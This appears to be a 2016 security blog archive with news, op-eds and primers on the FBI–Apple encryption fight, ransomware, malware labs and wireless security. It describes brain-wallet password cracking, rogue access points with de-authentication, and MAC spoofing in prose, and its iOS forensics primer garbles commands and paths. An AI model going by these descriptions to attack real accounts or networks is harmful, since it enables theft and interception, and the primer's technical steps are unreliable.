Category Archives: Hacks

Apple IOS Forensic Primer

Posted on February 19, 2016 | 1 comment

iPhoneThe Operating System that Apple licenses to its users is IOS. It is resident and runs on their mobile devices (like the IPOD, IPhone and the IPAD). Legally, Apple specifically states it retains ownership of the IOS. There is legal precedent being argued (by the US DOJ) that will hold Apple to its continued ownership interest in IOS. This means the company can potentially be subpoenaed to assist Law Enforcement in exploitation of software on a target phone (which runs the IOS) in the execution of a search warrant.

While authorities wait for the decision on this particular legal argument, IOS forensics is necessary if the Apple device (in question) has been used in or found to be evidence in a crime. While the DOJ argues the precedent that “a product’s continued ownership interest in a product after it is sold obliges the company to act as an agent of the state”, the administrator needs to be able to pull data off of that device immediately during the conduct of an investigation. Even if an administrator is just trying to see if the user is violating (or has violated) company policy, there is a need to be able to access the data on the device.

There is a lot of data that gets stored on IPhones. Some people have more data on their IPhone than they have on their computers. If you browse the phones hard drive (typically this is done with a phone disk tool) you will not be able to see the full file system but, if you could see it, it bears a strong resemblance to the “MAC OS”. The MAC OS x” is built on a core called “Darwin” and the IPhone has all of the directory structure that the Mac operating system has.

For example, the maximum number of allocation blocks per volume that File Manager can access on a Mac OS system is 65,535. The IOS is basically a “MAC OS” system that has been tuned and tailored to operate on the smaller mobile devices which have different processors in them.

As we examine the directories and analyze their subdirectories, we see what is available as we dig down inside the device. The “DCIM” directory holds the “100 Apple” directory which will show the administrator where all of the pictures are. We also have a downloads directory (which holds all downloads), an iTunes directory (which holds all mp3 files), etc. The significance is that all of these directories give you the ability to see user data on a particular system.

Another place you can go looking for system information is in a terminal window. The terminal window gives an administrator the ability to use the command line interface to examine the device and the device data. Complete device access can be obtained when the “sudo” super user command is invoked. You will type;

$sudo su clyde (The user becomes a super user)

$cd (change directory)

$pwd (Here, we print the working directory)

$/user/clyde (This is our current directory)

The terminal window gives us the ability to examine the data inside the device as a super user (which gives us complete access to the system). When we look inside a device as a super user we know we will have the ability to access all additional files in the system. Instead of looking at the phone itself with different tools, you can analyze the system through a terminal command line.

$cd Library/ (change directory to the Library)
#cd ApplicationSupport/ (Change directory to the ApplicationSupport directory)

$ls (we list the contents of the directory, while we look for the MobileSync directory)

An administrator can examine and analyze the device’s “mobile sync” in relation to the computer the device has been syncing with.

$cd MobileSync (change directory to the MobileSync directory)

$ls (list the contents of the directory)

Backup (this is the contents of the directory)

$cd Backup (Change directory to the backup directory)

$ls (This will list all of the backups in the backup directory)

This is significant because in addition to examining the device data, I can pull up all of the “Backups” and select one of the backups. There is a lot of data stored in the backups. These files are just the backup information that has been stored on the hard drive. When the connected device (whether it is an IPad or IPhone) has its data copied onto the computer, in addition to being able to look at the directory on the phone itself using a utility like “Phone disk”, an administrator could also analyze the data in the backup. If you don’t have the phone but you have the computer, you may have almost as good a set of information as if you did have the phone because the backup stores a lot of information. It has to store all of the information you would need to restore the phone. The backup has got to store everything about your phone that you had previously.

If you have a user’s computer and you find the IPhone backups, you have the information that was stored on the phone. There are utilities that can be used to analyze these IPhone backups which have the ability to extract information from them. This will give an administrator the ability to examine all of the data that was captured in the scheduled backups.

When you are performing IOS forensics, there is not only the question of looking at the phones data because; sometimes an administrator won’t be able to obtain access to the data if the phone has a “Pass Code”. However, if you have access to the backup directory on the computer that the phone “syncs” with, you may have a better chance of getting the data from that device and doing your forensic analysis on the phone while you are actually working on the computer where the backups are stored. This is what eliminates IOS’s ability to thwart administrators and Law Enforcement from performing a forensic analysis.

Read more: Apple IOS Forensic Primer http://www.sooperarticles.com/technology-articles/mobile-computing-articles/apple-ios-forensic-primer-1453263.html#ixzz40dsmaebc
Follow us: @SooperArticles on Twitter | SooperArticles on Facebook

1 Comment

Posted in Encryption, Forensic, Hacking, Hacks, Law Enforcement, Security

Tagged , , ,

JOHN MCAFEE: I’ll decrypt the San Bernardino phone free of charge so Apple doesn’t need to place a back door on its product

Posted on February 19, 2016 | Leave a comment

John_McAfeeCybersecurity expert John McAfee is running for president in the US as a member of the Libertarian Party. This is an op-ed article he wrote and gave us permission to run.

Using an obscure law, written in 1789 — the All Writs Act — the US government has ordered Apple to place a back door into its iOS software so the FBI can decrypt information on an iPhone used by one of the San Bernardino shooters.

It has finally come to this. After years of arguments by virtually every industry specialist that back doors will be a bigger boon to hackers and to our nation’s enemies than publishing our nuclear codes and giving the keys to all of our military weapons to the Russians and the Chinese, our government has chosen, once again, not to listen to the minds that have created the glue that holds this world together.

This is a black day and the beginning of the end of the US as a world power. The government has ordered a disarmament of our already ancient cybersecurity and cyberdefense systems, and it is asking us to take a walk into that near horizon where cyberwar is unquestionably waiting, with nothing more than harsh words as a weapon and the hope that our enemies will take pity at our unarmed condition and treat us fairly.

Any student of world history will tell you that this is a dream. Would Hitler have stopped invading Poland if the Polish people had sweetly asked him not to do so? Those who think yes should stand strongly by Hillary Clinton’s side, whose cybersecurity platform includes negotiating with the Chinese so they will no longer launch cyberattacks against us.

The FBI, in a laughable and bizarre twist of logic, said the back door would be used only once and only in the San Bernardino case.

Tim Cook, CEO of Apple, replied:

The government suggests this tool could only be used once, on one phone. But that’s simply not true. Once created, the technique could be used over and over again, on any number of devices. In the physical world, it would be the equivalent of a master key, capable of opening hundreds of millions of locks — from restaurants and banks to stores and homes. No reasonable person would find that acceptable.

The government is asking Apple to hack our own users and undermine decades of security advancements that protect our customers — including tens of millions of American citizens — from sophisticated hackers and cybercriminals. The same engineers who built strong encryption into the iPhone to protect our users would, ironically, be ordered to weaken those protections and make our users less safe.

Tim_Cook

No matter how you slice this pie, if the government succeeds in getting this back door, it will eventually get a back door into all encryption, and our world, as we know it, is over. In spite of the FBI’s claim that it would protect the back door, we all know that’s impossible. There are bad apples everywhere, and there only needs to be in the US government. Then a few million dollars, some beautiful women (or men), and a yacht trip to the Caribbean might be all it takes for our enemies to have full access to our secrets.

Cook said:

The FBI may use different words to describe this tool, but make no mistake: Building a version of iOS that bypasses security in this way would undeniably create a backdoor. And while the government may argue that its use would be limited to this case, there is no way to guarantee such control.

The fundamental question is this: Why can’t the FBI crack the encryption on its own? It has the full resources of the best the US government can provide.

With all due respect to Tim Cook and Apple, I work with a team of the best hackers on the planet. These hackers attend Defcon in Las Vegas, and they are legends in their local hacking groups, such as HackMiami. They are all prodigies, with talents that defy normal human comprehension. About 75% are social engineers. The remainder are hardcore coders. I would eat my shoe on the Neil Cavuto show if we could not break the encryption on the San Bernardino phone. This is a pure and simple fact.

And why do the best hackers on the planet not work for the FBI? Because the FBI will not hire anyone with a 24-inch purple mohawk, 10-gauge ear piercings, and a tattooed face who demands to smoke weed while working and won’t work for less than a half-million dollars a year. But you bet your ass that the Chinese and Russians are hiring similar people with similar demands and have been for many years. It’s why we are decades behind in the cyber race.

gettyimages-136135710

Cyberscience is not just something you can learn. It is an innate talent. The Juilliard School of Music cannot create a Mozart. A Mozart or a Bach, much like our modern hacking community, is genetically created. A room full of Stanford computer science graduates cannot compete with a true hacker without even a high-school education.

So here is my offer to the FBI. I will, free of charge, decrypt the information on the San Bernardino phone, with my team. We will primarily use social engineering, and it will take us three weeks. If you accept my offer, then you will not need to ask Apple to place a back door in its product, which will be the beginning of the end of America.

If you doubt my credentials, Google “cybersecurity legend” and see whose name is the only name that appears in the first 10 results out of more than a quarter of a million.

Leave a comment

Posted in Encryption, Forensic, Hacking, Hacks, Law Enforcement, Network, Security, Technology

Tagged , , , , ,

Edward Snowden defends Apple in fight against FBI

Posted on February 18, 2016 | 2 comments

Edward Snowden — the ex-NSA contractor who started this whole privacy debate — has joined the ranks of Apple defenders.
Snowden

On Tuesday, a federal magistrate-judge ruled that Apple must help the FBI break into the phone of one of the San Bernardino shooters. The FBI was unable to figure out the shooter’s passcode, which is the only way to get inside his iPhone.

Apple CEO Tim Cook is furious, saying that the U.S. government is trying to undermine the security of its flagship product.

“The government is asking Apple to hack our own users and undermine decades of security advancements that protect our customers,” Cook said.

Apple plans to fight the decision, aided by the ACLU.

On Wednesday, the divide was clear: politicians versus engineers.

“The FBI is creating a world where citizens rely on Apple to defend their rights, rather than the other way around,” Snowden said Wednesday morning on Twitter.

Late Wednesday, Silicon Valley’s powerful tech industry trade group came out in support of Apple too.

“We worry about the broader implications … of requiring technology companies to cooperate with governments to disable security features, or introduce security vulnerabilities,” said the Information Technology Industry Council, which represents Dell, Facebook (FB, Tech30), Google, Hewlett Packard (HPE, Tech30), IBM (IBM, Tech30), Microsoft (MSFT, Tech30), Nokia (NOK) and others.

For years, the FBI has demanded special access into smartphones. Tech companies have refused, instead increasing the security of their customers’ data.

Cryptographers, the scholars who build security into technology, have unanimously warned that special access is a dangerous idea. To them, this isn’t about security competing with privacy. It’s just about security.

The San Bernardino shooter, Syed Farook, used an iPhone 5C. The FBI has been trying to guess his passcode to unlock it. If they guess wrong 10 times, Farook’s iPhone will permanently erase all the data stored inside.

Apple doesn’t hold the keys to his device. But the FBI wants Apple to create a special version of its iOS software that will get loaded onto the phone, circumvent Apple’s security features and let agents hack it.

Dan Guido, who runs the cybersecurity firm Trail of Bits, explained in a blog post Wednesday that this hack is possible. He said it would work on any iPhone 5C or older model, putting them “at risk when they’re confiscated by law enforcement around the world.”

Last year, the world’s top cryptographers issued a joint paper saying this is a bad idea. CNNMoney asked them if this particular San Bernardino case changes their mind. All seven who responded said no.

Matthew Green, who teaches cryptography and computer security at Johns Hopkins University, fears it’s a slippery slope. If Apple complies with the government this time, it’ll be forced to in the future.

“I haven’t seen any guiding principle that would prevent this from getting out of hand. It could easily result in every American becoming less secure,” he said.

Columbia University computer science professor Steven M. Bellovin said that if Apple doesn’t resist the FBI, it’ll soon face the same pressure from authoritarian and repressive governments like China.

“This makes it much easier for others — other police departments, other governments — to demand the same thing,” he said.

Bruce Schneier, one of the world’s top cryptographers, warned that criminals could also use this kind of special access to break into people’s phones to steal messages, photographs and other personal information. If Apple creates a weaker version of its operating system, others will get their hands on it.

Most tech industry executives — who normally tout privacy — remained silent Wednesday. WhatsApp cofounder Jan Koum stood out with this message on Facebook: “We must not allow this dangerous precedent to be set.”

U.S. Senator Ron Wyden of Oregon, one of the few politicians to rise to Apple’s defense, said “no company should be forced to deliberately weaken its products.”

(Read more: Manhattan DA says Apple makes terrorism cases ‘go cold’)

Other politicians pushed back on that idea Wednesday. White House Press Secretary Josh Earnest told reporters that the FBI is “not asking Apple to redesign its product or create a new backdoor to one of their products. They’re simply asking for something that would have an impact on this one device.”

Leading Republican presidential candidate Donald Trump weighed in too, saying, “we have to open it up.” Marco Rubio, who is also vying for the Republican presidential nomination, said Apple should give up its fight and be “a good corporate citizen.”

But even those who support the FBI’s demands say it’s a point of no return. Cyrus Walker teaches at the government-funded Cyber Defense Analysis Center, where he trains federal agents and police how to hack smartphones in criminal cases.

“If Apple demonstrates the ability to get around its own security countermeasures, that bell is rung and can’t be un-rung,” said Walker.

2 Comments

Posted in Encryption, Forensic, Hacking, Hacks, Law Enforcement, Security, Technology

Tagged , , , ,

Google CEO Sides With Apple And Tim Cook, Opposes FBI’s Demand For iPhone Backdoor

Posted on February 18, 2016 | 4 comments

apple-googleGoogle’s CEO Sundar Pichai has joined a number of other high profile individuals in expressing his opinions on FBI’s request for Apple to provide backdoor access to an iPhone 5c that forms part of the San Bernardino shooting case. A federal judge has ruled that Apple must indeed assist law enforcement in granting access to a seized iPhone 5c that belonged to one of the shooters accused of killing 14 individuals in California. Commenting on the situation via the use of social media, Sundar Pichai called it a “troubling precedent”.

If you weren’t privy to the whole situation, then it’s probably worth noting that Apple’s CEO Tim Cook almost instantly responded to the ruling with a public and open message to Apple’s customers. In addition to providing a little insight into the ruling and how it came about, Cook also took the opportunity to inform the customers that Apple would be contesting the ruling, claiming that the FBI essentially wants Apple’s engineers to create a new version of iOS that comes with the ability to circumvent very specific security features (read: backdoor access). Cook clearly doesn’t want to have to build in a backdoor to the iPhone or iPad.



Google’s CEO didn’t instantly get involved in the situation, but has since posted a series of tweets which show that he sides with Tim Cook and Apple as a whole. Most notably, Pichai’s five tweets on the predicament claimed Apple’s acceptance of the ruling, if that was indeed the company’s stance, “could compromise a user’s privacy”. He also stated publicly that acceptance of a ruling to provide access to data based on valid legal order is “wholly different than requiring companies to enable hacking of customer devices & data”. It’s difficult to disagree with those views.

Of course, not everyone weighing in with an option on the San Bernardino iPhone situation is fully accepting of Apple’s stance on the ruling. Republic candidate, and general worldwide laughing stock, Donald Trump, predictably doesn’t agree with Tim Cook’s decision to resist the order, stating that he agrees “100 percent with the courts” and calling Apple “Who do they think they are?”.

We’re pretty sure that the public backing of a fellow CEO in the position of Pichai carries a whole lot more importance than the negativity of Mr. Trump.

You can follow us on Twitter, add us to your circle on Google+ or like our Facebook page to keep yourself updated on all the latest from Microsoft, Google, Apple and the Web.

4 Comments

Posted in Encryption, Forensic, Hacking, Hacks, Law Enforcement, Security, Technology

Tagged , , , ,

FBI wants $38 million in new funding to break encryption

Posted on February 17, 2016 | 2 comments

The funding bid will help the agency “develop and acquire tools” that break encryption.

FBI-large

The FBI is looking to spend an additional $38.3 million in the coming year to “counter the threat” of encryption.

That’s on top of $31 million already spent on the initiative, according to the agency’s fiscal 2017 budget request published earlier this week by the Justice Department.

The budget request will not be used to hire any new staffers on top of the 39 staffers (including 11 agents), but will be used to “develop and acquire tools for electronic device analysis, cryptanalytic capability, and forensic tools.”

In other words: the feds want access to your encrypted communications, and it’s willing to throw money at doing exactly that.

According to the document, the additional funding will “counter the threat of Going Dark, which includes the inability to access data because of challenges related to encryption, mobility, anonymization, and more.”



8 Ways Technology Is Improving Your Health

The FBI refers to “going dark” as a metaphor for not being able to read the communications and messages of suspected criminals and terrorists.

The FBI did not immediately respond to a request for comment asking what exactly the combined $69.3 million on anti-encryption efforts would entail.

The FBI is known to buy exploits from private intelligence companies, like the Milan, Italy-based Hacking Team, which last year was hit by hackers who leaked documents detailing the company’s work and global government partners.

Encryption, and other privacy tools are increasingly troublesome for the agency, something FBI director James Comey has repeatedly claimed in the past year.

The U.S. government is crying foul over Apple and Google’s efforts to bolster smartphone encryption. Because accusations that they’re going “beyond the law” goes both ways.

The agency chief has been on a tear trying to convince lawmakers and technology giants alike that locking the agency out is making it harder to catch criminals, despite reports suggesting the complete opposite.

Comey’s anti-encryption rhetoric intensified after Apple rolled out encryption in its iPhones and iPads in iOS 8, thought to be in response to claims in documents leaked by whistleblower Edward Snowden that said Apple was a participant in the notorious PRISM surveillance program. In doing so, Apple put encryption in the hands of its users, cutting even itself out of the loop, which riled the FBI which would regularly ask for the company’s help in unlocking criminals’ phones.

The bump in funding comes as the agency continues to realign its efforts to keep ahead of the technological curve.

The document also said the agency would spend an additional $85.1 million on its cyber offensive and defensive operation.

“The FBI will obtain updated and sophisticated IT hardware, IT software, and contractors to expand the foundation of its offensive and defensive operations,” the report said.

2 Comments

Posted in Encryption, Forensic, Hacking, Hacks, Law Enforcement, Security, Technology

Tagged , , , , ,

Hackers Are Holding an LA Hospital’s Computers Hostage

Posted on February 17, 2016 | 2 comments

hpmc-100644867-primary.idge

Ransomware attacks, in which hackers lock your computer or keyboard until you pay a ransom, are on the rise. The latest notable ransomware victim is Hollywood Presbyterian Medical Center in Los Angeles, whose computers have been offline for over a week. The computers will come back online, the hackers reportedly say, in exchange for $3.4 million, paid in bitcoin.

The Hack

The incident, first reported by a local NBC affiliate, affects the Los Angeles hospital’s computer systems, including those needed for lab work, pharmaceutical orders, and even the emergency room.

While the hospital’s spokesperson was unavailable to comment, HPMC president and CEO Allen Stefanek told KNBC that it was “clearly not a malicious attack; it was just a random attack.” It’s not clear what he means, though; a hospital in a wealthy neighborhood seems unlikely to be a random target, especially for such a large sum.

As WIRED explained last fall, while ransomware has been around for over a decade, hackers have been embracing increasingly sophisticated methods. In the past, ransomware could only lock down a target’s keyboard and computer; now, hackers can encrypt an infected system’s files with a private key known only to the attacker. That may be what has happened here, according to anonymous hospital sources who told NBC4 that the hackers offered a “key” in exchange for the ransom money. The hospital has yet to officially detail the attack.



Who’s Affected

Stefanek told NBC4 that patient care hasn’t suffered, although some 911 patients have been sent to other nearby hospitals. Meanwhile, it appears to mostly add up to a headache for those in the HPMC system because hospital staff have had to write all documentation out by hand for the last week. Some patients, meanwhile, need to drive to more remote hospitals for medical tests that HPMC cannot offer without a functioning network.

The fallout appears limited to this one hospital, though, and even within its walls the impact seems annoying, but not crippling. HPMC says it’s working with the FBI, LAPD, and computer forensics experts to recover its systems.

How Bad Is It?

Given the degree of things that could potentially go wrong at the intersection of hospitals and hackers, this isn’t so terrible. But in terms of the scale of the ransomware, it’s about as as bad as it gets. Symantec recently pegged the total amount of ransomware paid out in any given year at $5 million. This single incident asks for well over half that amount.

The bigger impact may not be clear until after the incident is resolved. If the hospital ends up paying out, it could inspire copycat attacks. If not, and the hackers are identified, it could act as a deterrent. Either way, for now it shows that no target is off limits for ransomware, nor is any sum.

2 Comments

Posted in Data Breach, Hacking, Hacks, Law Enforcement, Malware, Network, Security

Tagged , , , ,

Password cracking attacks on Bitcoin wallets net $103,000

Posted on February 16, 2016 | 1 comment

wallet-640x464
Hackers have siphoned about $103,000 out of Bitcoin accounts that were protected with an alternative security measure, according to research that tracked six years’ worth of transactions. Account-holders used easy-to-remember passwords to protect their accounts instead of the long cryptographic keys normally required.

The heists were carried out against almost 900 accounts where the owners used passwords to generate the private encryption keys required to withdraw funds. In many cases, the vulnerable accounts were drained within minutes or seconds of going live. The electronic wallets were popularly known as “brain wallets” because, the thinking went, Bitcoin funds were stored in users’ minds through memorization of a password rather than a 64-character private key that had to be written on paper or stored digitally. For years, brain wallets were promoted as a safer and more user-friendly way to secure Bitcoins and other digital currencies, although Gregory Maxwell, Gavin Andresen, and many other Bitcoin experts had long warned that they were a bad idea.

The security concerns were finally proven once and for all last August when Ryan Castellucci, a researcher with security firm White Ops, presented research at the Defcon hacker convention that showed how easy it was to attack brain wallets at scale. Brain wallets used no cryptographic salt and passed plaintext passwords through a single hash iteration (in this case, the SHA256 function), a shortcoming that made it possible for attackers to crack large numbers of brain wallet passwords at once. Worse, a form of the insecurely hashed passwords are stored in the Bitcoin blockchain, providing all the material needed to compromise the accounts.

By contrast, Google, Facebook, and virtually all other security-conscious services protect passwords by storing them in cryptographic form that’s been passed through a hash function, typically tens of thousands of times or more, a process known as key stretching that greatly increases the time and resources required by crackers. The services also use cryptographic salt, a measure that requires each hash to be processed separately to prevent the kind of mass cracking Castellucci did. Security-conscious services also go to great lengths to keep password hashes confidential, a secrecy that’s not possible with Bitcoin because of the transparency provided by the blockchain.

Brain drain

According to a recently published research paper, the brain wallet vulnerability was known widely enough to have been regularly exploited by real attackers going after real accounts. Over a six-year span that ended last August, attackers used the cracking technique to drain 884 brain wallet accounts of 1,806 bitcoins. Based on the value of each coin at the time the theft took place, the value of the purloined coins was $103,000.

“Our results reveal the existence of an active attacker community that rapidly steals funds from vulnerable brain wallets in nearly all cases we identify,” the paper authors wrote. “In total, approximately $100K worth of bitcoin has been loaded into brain wallets, with the ten most valuable wallets accounting for over three-quarters of the total value. Many brain wallets are drained within minutes, and while those storing larger values are emptied faster, nearly all wallets are drained within 24 hours.”

The paper, titled “The Bitcoin Brain Drain: A Short Paper on the Use and Abuse of Bitcoin Brain Wallets,” is scheduled to be presented later this month at the Financial Cryptography and Data Security 2016 conference. Its publication comes about six months after Brainwallet.org, the most widely used Bitcoin-based brain wallet service, permanently ceased operations. The service voluntarily shut down following the Defcon presentation by Castellucci, who is one of the authors of the most recent paper.Crackers tap new sources to uncover “givemelibertyorgivemedeath” and other phrases.

To identify brain wallets and then crack them, the research team compiled 300 billion password candidates taken from more than 20 lists, including the Urban Dictionary, the English language Wikipedia, the seminal plaintext password leak from the RockYou gaming website, and other large online compromises. By collecting words and entire phrases from a wide body of sources, the researchers employed a technique Ars covered in 2013 that allowed them to crack words and phrases many people would have considered to be strong passwords. Cracked passphrases included “say hello to my little friend,” “yohohoandabottleofrum,” and “dudewheresmycar.”

The researchers ran each password candidate through the SHA256 function to derive a list of potential private keys for Bitcoin addresses used by brain wallets. They then used a cryptographic operation based on elliptic curves to find the public key corresponding to each potential private key. Since the Bitcoin blockchain contains the public key of every account wallet, it was easy to know when a password guess was used by a real Bitcoin user.

The paper reported that vulnerable accounts were often drained within minutes of going live, and in an interview, Castellucci said that some accounts were liquidated in seconds. Castellucci said he suspects the speed was the result of attackers who used large precomputed tables containing millions or billions of potential passwords. While many of the attackers who drained vulnerable accounts earned paltry sums for their work, the top four drainers netted about a total of $35,000 among them. Meanwhile, the drainer who emptied the most brain wallets—about 100 in all—made $3,219.

The thefts were often chronicled in online forums, where participants would report that their Bitcoin wallets had mysteriously been emptied. For a while, people assuming the role of a digital Robin Hood claimed to crack vulnerable wallets, drain them of their contents, and then wait for the victim to publicly complain of the theft on Reddit or various bitcoin forums. The Robin Hood and Little John hackers would then claim to return the funds once the victim proved control of the compromised private key.

While plenty of people publicly warned of risks of brain wallets over the years, the vulnerability was often dismissed as theoretical by some. Brain wallets are now generally shunned by Bitcoin users, but Castellucci warned that an alternative crypto currency known as Ethereum can use a brain wallet scheme that’s every bit as weak as the Bitcoin one was. He is withholding details for now in the hopes that Ethereum brain wallets will soon be abandoned.

1 Comment

Posted in Encryption, Hacking, Hacks, Security, Technology

Tagged , , , , ,

Laboratory and Online Malware Analysis

Posted on February 14, 2016 | Leave a comment

MalwareYour Network has been compromised by a Virus, Worm, Trojan, a botnet client or some other form of Malware. As the Systems or Network Administrator, you know Malware Analysis is necessary because your system (or network) has been exposed. The goal is to figure out what that malware has done so you can determine the destruction or the damage caused by this activity. You also need to figure out the threat or vulnerability your company has been exposed too and determine if (there is a risk) information is leaving your enterprise.

Depending on the nature of your business (Cybersecurity facilitates the conduct of business); the Administrator investigates to determine if there could be damage to individual users (or consumers) through the loss of credit card or personal information. The Administrator must also check to see if there is damage to the company through the loss of intellectual property which Malware has caused to be taken. An initial assessment of the loss or damage is made. Although Malware attacks have permeated every platform, the Windows environment remains the most popular platform (to attack) among Malware authors.

The Security minded Administrator will have a Virtual or traditional controlled (isolated) laboratory set up to examine Malware specimens. The Virtual lab allows the Administrator to run multiple clients or servers (and multiple operating systems) on a single computer system to examine how Malware specimens interact with other computer systems within a network. The Virtual lab also allows you to record the state of a system or network (before the Malware is introduced) by taking snapshots. This also allows the Administrator to return a system or network to its original state after the analysis is complete.

Networking in the Virtual environment allows the Administrator to observe the Malware exhibit its full potential in a controlled environment as the malicious program reveals its network interactions. When you employ this laboratory set up, you must employ a large hard drive (for the files on the physical system’s hard drive) and you must install as much RAM into the physical system as you can ( which is an important performance factor for virtualization tools). You will employ an inexpensive hub or switch where applicable.

The Professional Malware writer has begun producing Malware that can detect if it is being run in a virtualized environment. This makes it practical to also have physical machines available for laboratory systems also. The Isolated Test Lab is a necessity for proper analysis and developing the skills critical to an Administrator and Incident Response (IR) team responding to security incidents. The free tools that will aid the Administrator’s analysis in the lab are:

  1. Network monitoring: Wireshark – We can use this network sniffer to observe lab traffic for malicious communications
  2. Process monitoring: Process Explorer (and Process Hacker) – We can replace Windows Task manager and observe malicious processes.
  3. Change detection: Regshot – We can compare the system’s state (Registry and File System) before and after the infection.
  4. File system and registry monitoring: Process Monitor (with ProcDOT) – We can observe how local processes read, write, or delete registry entries and files. These tools can help you understand how malware attempts to embed into the system upon infection.

An Administrator who has gained a sense of the key capabilities of the malicious executable may seek to discover details of the Malwares characteristics through code analysis. There are disassemblers, debuggers and memory dumpers freely available that will assist with the process of reverse engineering the malicious executable.

Malware Behavioral Analysis

In the Behavioral Analysis of the Malware specimen we have isolated it allows an Administrator to figure out what the Malware has done and what it is capable of doing as it interacts with its environment. When we are subject to a Malware attack, we can see if it maintains contact with an attacker, what actions it performs within an infected system and how it spreads. Analyzing the Malware in a controlled (isolated) environment can answer all of our IR questions and guide the IR team to the proper response.

In the case of zero day infections (signatures), the IR team has a virus loose on the system or the network performing tasks that are contrary to operations while the Administrators don’t really know what it is doing. The antivirus software does not get the signatures up-to-date and we do not get the Malware removed. We must take precautions to isolate the malware-analysis lab from the production network, to mitigate the risk that a malicious program will escape (and infect the operations environment).

Online Malware Analysis Tools

There are many websites that can be of assistance in performing malware analysis. People are concerned enough to understand the value of malware analysis because of the overbearing amount of malware we are inundated with and the destructive nature of what it does. There are many sites that will perform the malware analysis for you.

The first website we will mention is “Virus Total”. It is a community driven website. It allows you to upload a file and have “Virus Total” perform the analysis. The site will analyze your upload and tell you if it’s a piece of malware, identified by name or class, and give you some understanding of what that malware has done or what it can do which gives the user a better understanding of what they are dealing with.

A second website I would like to mention is “Cuckoo”. It gives you the ability to perform an analysis from file properties and from a hash of the file. “Virus Total” looks at the characteristics of the file that has been uploaded. “Cuckoo” will actually run the software for you and capture what is going on in real time.

This is actually done in a very safe environment. It performs these actions through the use of virtual machines. “Cuckoo” automates the process with virtual machines running the executable malware so we can actually see what is going on in the machine or on the network. Basically, “Cuckoo” is a virtual sandbox that allows us to observe and analyze malware.

There are other websites that perform free automated behavioral analysis (malware analysis) on compiled Windows executables (that an Administrator may supply). The primary difference is each website employs a different analysis technology on the back end. The advantage for the Administrator (who is submitting the executable) is that it broadens the field of analysis on the executable. These tools include:

Anubis

BitBlaze

Comodo (Automated Analysis System)

EUREKA

Malwr

ThreatExpert

Conclusion

When we have software that is being used for malicious purposes, the Administrator needs to understand what is happening on the systems or network. The Administrator needs to know the damage this piece of executable software has introduced into the network that is causing problems so we can determine what contingency to undertake to correct the problem. The Administrator can also figure out what is needed to protect the network or recover from the malicious activity that has gone on with this malware that was introduced into operations

 

Leave a comment

Posted in Data Breach, Encryption, Forensic, Hacking, Hacks, Malware, Security, Technology

Tagged , ,

FBI Still Can’t Access San Bernardino Shooter’s Encrypted Phone

Posted on February 13, 2016 | Leave a comment

Although the phone has been taken as evidence, there is still no way to find out what information it holds due to the encryption key that only the owner can unlock.

phone

The FBI still cannot unlock the encrypted cellphone of one of the San Bernardino shooters more than two months after the California terrorist attack.

FBI Director James Comey told the Senate Intelligence Committee on Tuesday that his agency’s inability to access the information in the retrieved phone is an example of the effect on law enforcement of the growing use of encryption technology.

Comey said the problem of “going dark” is overwhelmingly affecting law enforcement at all levels.

“It affects cops and prosecutors and sheriffs and detectives trying to make murder cases, car accident cases, kidnapping cases, drug cases,” Comey said.

He said the biggest concern was phones that automatically locked and secured all information inside.

“It is a big problem for law enforcement armed with a search warrant, when you find a device that can’t be opened even when a judge said there’s probable cause to open it,” Comey said.

Sen. Dianne Feinstein of California, the ranking Democrat on the committee, and the committee’s chairman, Sen. Richard Burr, R-N.C., have said they are considering legislation that would compel manufacturers to provide law enforcement access to encrypted data when there’s a court order. Industry associations have opposed such proposals.

While encryption issues are more common in local criminal cases, counterterrorism investigations are also affected, Comey said. He cited the December attack in San Bernardino, in which Syed Rizwan Farook and Tashfeen Malik killed 14 people at a holiday party.

“In San Bernardino, a very important investigation to us, we still have one of those killers’ phones that we have not been able to open. It’s been over two months now; we’re still working on it,” Comey said.

Comey previously told Congress that investigators could not read more than 100 text messages that one of the shooters who attacked a cartoon contest in Garland, Texas, last year exchanged with an “overseas terrorist.” The contest was to draw caricatures of the Prophet Muhammad.

Privacy advocates who oppose limits on encryption argue that giving such backdoor access to data opens devices to thieves and hackers. A recent report from Harvard University’s Berkman Center for Internet and Society concluded that law enforcement fears of encryption are exaggerated, in part because increasingly sophisticated technology is opening up other ways for police to conduct surveillance.

National Intelligence Director James Clapper told the senators that he thinks the government and tech companies should be able to work out a solution without resorting to legislation.

“I’m not sure we’ve exhausted all the possibilities here technologically,” Clapper said.

Adm. Michael Rogers, director of the National Security Agency, said “encryption is foundational to the future.” The challenge, he said, is finding the balance between privacy and security.

Leave a comment

Posted in Encryption, Forensic, Hacking, Hacks, Network, Security

Tagged , , , , ,

Security for Wireless Devices

Posted on February 12, 2016 | 3 comments

 

WirelessThis subject  of securing wireless devices      conjures up visions of your PC or mobile phone connecting to the Internet through some hotspot at Starbucks. But it is so much more than that. Let’s look at the facts:

  • Even back in 2013, 98 percent of U.S. small businesses used wireless technologies in their operations according to an AT&T poll.
  • The Internet of Things (IoT) is rapidly expanding, and it is based firmly on wireless. For example, many home and office security systems are wireless.
  • Mobile phones are becoming the main avenue to the Internet for an increasing number of people all over the world.

So it makes sense that wireless security should be a big concern.

Wireless technologies are more vulnerable than wired technologies

Keep in mind that many businesses have wired and wireless networks. Wireless devices are vulnerable to any attacks that may be made on wired devices. But there are many more threats to wireless networks. This is because wireless transmits data over the air. The air cannot be secured. So wireless technologies must incorporate more safeguards against eavesdropping and man-in-the middle attacks than wired technologies.

For example, man-in-the middle attacks in a wireless environment are child’s play. An attacker connects to the Internet and configures a laptop to look like a legitimate wireless access point (AP). Victims wanting Internet access unwittingly connect through the bogus AP. Furthermore, the attacker can launch a de-authentication attack, causing devices already connected to a legitimate AP to drop their connection and to automatically reconnect to the attacker’s AP. The attacker now has unlimited access to data transmitted by any attached user since wireless operates at Layer 2. Layer 3 protections such as encryption, network authentication, and virtual private networks (VPNs) cannot protect against this scenario.

Two wireless devices can communicate without involving the access point. This is clearly not a possibility in the wired world. So not only must there be protection against external threats, but also against other devices attached to the AP.

Denial of Service attacks are a danger to any network, but especially with the restricted bandwidth of wireless networks.

Wireless Security measures that don’t work

Some sources recommend wireless security measures that are not effective for business. Here are three examples:

  1. Most wireless configurations provide MAC filtering. Here, an administrator enters a list of the MAC addresses (Layer 2 addresses) of authorized devices. A device with a MAC address that is not on the list is blocked. But any attacker with sniffing software can easily find authorized MAC addresses since MAC addresses in Layer 2 headers are not encrypted. The attacker simply changes his own MAC address, via widely-available software, to an authorized address, and he’s “in”.
  2. In setting up a wireless network connection, there is normally an option to hide the SSID (Service Set Identifier). This keeps the connection from appearing on a list, but does not prevent anyone from using the connection.
